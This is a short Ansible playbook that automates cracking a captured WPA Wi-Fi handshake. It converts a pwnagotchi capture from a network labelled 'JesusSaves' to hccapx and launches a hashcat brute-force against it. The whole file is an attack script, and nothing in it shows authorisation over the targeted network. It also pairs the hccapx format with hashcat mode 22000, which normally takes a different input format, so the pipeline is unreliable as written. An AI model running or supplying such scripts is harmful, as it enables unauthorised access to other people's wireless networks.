---

- hosts: localhost
  vars:
    dir_pwnagotchi: ~/pwnagotchi_handshakes
    dir_hashcat_utils: ~/github/hashcat-utils
    timestamp: "{{ '%Y-%m-%d' | strftime }}"

  tasks:
    - name: Make hccapx file from handshake
      shell:
        cmd: '{{dir_hashcat_utils}}/bin/cap2hccapx.bin {{dir_pwnagotchi}}/{{timestamp}}/JesusSaves_40e1e441f2b3.pcap {{dir_pwnagotchi}}/{{timestamp}}/JesusSaves_40e1e441f2b3.hccapx'

    - name: Start bruteforcing using hashcat
      shell:
        cmd: 'hashcat -m 22000 --force -a 3 {{dir_pwnagotchi}}/{{timestamp}}/JesusSaves_40e1e441f2b3.hccapx'
